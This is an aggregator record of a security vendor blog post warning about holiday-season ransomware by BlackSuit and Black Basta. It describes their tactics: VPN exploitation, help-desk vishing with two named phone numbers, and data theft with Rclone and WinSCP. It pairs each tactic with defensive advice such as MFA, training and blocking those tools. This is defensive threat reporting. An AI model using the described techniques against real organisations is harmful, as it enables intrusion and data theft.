One Article Review
| Source |  AlienVault Lab Blog |
|---|---|
| Identifiant | 8623455 |
| Date de publication | 2024-12-11 12:00:00 (vue: 2024-12-11 14:07:56) |
| Titre | LevelBlue SOC Analysts See Sharp Rise in Cyber Threats: Stay Vigilant |
| Texte | This holiday season our SOC analysts have observed a sharp uptick in cyber threat activity. Specifically, they’ve seen a rise in attempted ransomware attacks, which started during the American Thanksgiving holiday period (November 25–31, 2024) and are expected to continue throughout the holiday season. We’re sharing details on the threat actors involved, their tactics, as well as recommendations to give you knowledge and tools to proactively strengthen your security against evolving threats. Key Threat Groups BlackSuit (formerly “Royal”) Known for targeting critical infrastructure sectors, including healthcare, government, and manufacturing, BlackSuit employs data exfiltration, extortion, and encryption techniques, according to a Cybersecurity and Infrastructure Security Agency (CISA) advisory. Common attack vectors include: Phishing emails and malicious websites Exploitation of unsecured virtual private networks (VPNs) lacking multi-factor authentication (MFA) Disabling antivirus software to exfiltrate data before encrypting systems Black Basta Operating as a ransomware-as-a-service (RaaS), Black Basta affiliates have targeted over 500 entities in 2024 alone in North America, Europe, and Australia, according to CISA. Key tactics: Vishing: Impersonating help desk technicians via phone to access networks Using malicious remote management tools to gain entry and escalate attacks LevelBlue Observations of Threat Actor TTPs and How to Fortify Security In recent weeks, our SOC team has observed threat actors using the following tactics to launch attacks: Tactic Recommendations Exploitation of a VPN portal that is not enforcing MFA to gain initial access Enforce MFA for VPN connections and geo-fence your VPN portal(s) Patch VPN devices. Historically we have observed these external-facing network appliances be compromised The use of vishing (impersonating a “help desk” team member) to gain initial access to end-user workstations, which then gives the attacker access to the larger network (emails and text messages are also being leveraged for credential collection and malware deployment) Two numbers LevelBlue has identified to be involved in incidents are 1-844-201-3441 and 304-718-2459 Provide employees with training and education on vishing attacks and the common lures that may be used Implement a process of verification for both help desk employees and employees being called during legitimate IT support scenarios Direct employees to report suspicious communications immediately to a supervisor and security leadership The use of Rclone, WinSCP, and other file transfer tools to exfiltrate data from environments Block the installation or execution of common attacker tools that do not have a designated function within your network, or strictly enforce the exceptions for allowing the usage Exploitation of vulnerabilities across common software/applications to escalate privileges Vulnerabilities for VMware, Microsoft Exchange, Microsoft SharePoint, and other self-hosted applications are being particularly targeted to gain administrator or even root access within environments Patch software per vendor recommendations and review your organization’s vulnerability |
| Notes | ★★★ |
| Envoyé | Oui |
| Condensat | “help 201 2024 2459 25–31 304 3441 500 718 844 about access according across activity actor actors adding additional address administrator advantage advisory affiliates against agency all allowing almost alone already also america american analysts antivirus any appliances applications apply are assets attack attacker attacker’s attacks attacks: attempted attempts australia authentication awareness basta been before being beyond black blacksuit block blocking both busy but called can choice cisa clear cloud collection com come common communicate communications compound compromised concerns connections consider contact contacts continue control controls cover credential critical customers cyber cyberattack cybercriminals cybersecurity data day decrease delivery deployment designated desk desk” desktop desktops details detection devices direct disable disabling diverse due during educate education effectiveness email emails employee employees employs enable encrypting encryption end endpoint endpoints enforce enforcing enhance enjoying ensure entire entities entry environment environments escalate europe even every everyone evolving exceptions exchange execution exfiltrate exfiltration expected experienced explicitly exploitation exposures external extortion facing factor fence festivities file finally flexible following forensics formerly fortify free from function gain gaps gateway geo give gives giving good government groups grow guidance has have healthcare heightened help here historically holiday holidays hosted hosts how identified identify immediately impersonating implement important incident incidents include: including info@levelblue infrastructure initial installation internal investigated involved it’s key know knowledge known lacking laptops larger lateral launch leadership leading least legitimate let levelblue levelblue’s leveraged limit linger lures maintain malicious malware manage managed management manufacturing may measures member messages mfa microsoft might monitoring more movement multi need network networks news north not note notifications november numbers observations observed of remote offer one operating operations options organization organization’s organizations other out over overall pair particularly patch patching per period phishing phone place poorly portal potential private privileges proactive proactively process protect protections protects protocol protocols provide provides public raas ransomware rclone rdp recent recognizing recommendations records recovery related remains remote report reporting require response retainer review rise rmm root running safe say scanning scenarios schedule season sectors secure secured security see seen segments self sentinelone servers service services several severe sharepoint sharing sharp significantly sites soc software software/applications specifically started stay stop strengthen strictly supervisor support surface suspicious systems tactic tactics tactics: take targeted targeting tasks team technicians techniques technologies tempting text than thanksgiving them then these they’ve threat threats threats: through throughout tiers time tools top traffic training transfer traversal trial ttps two type unknown unmanaged unsecured updates uptick urgency usage use used user using validate vectors vendor verification verifying vigilance vigilant virtual vishing vishing: vmware vpn vpns vulnerabilities vulnerability we’re web websites weeks well west/east when which will window winrm winscp within workloads workstations year your |
| Tags | Ransomware Malware Tool Vulnerability Threat Patching Medical Cloud |
| Stories | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.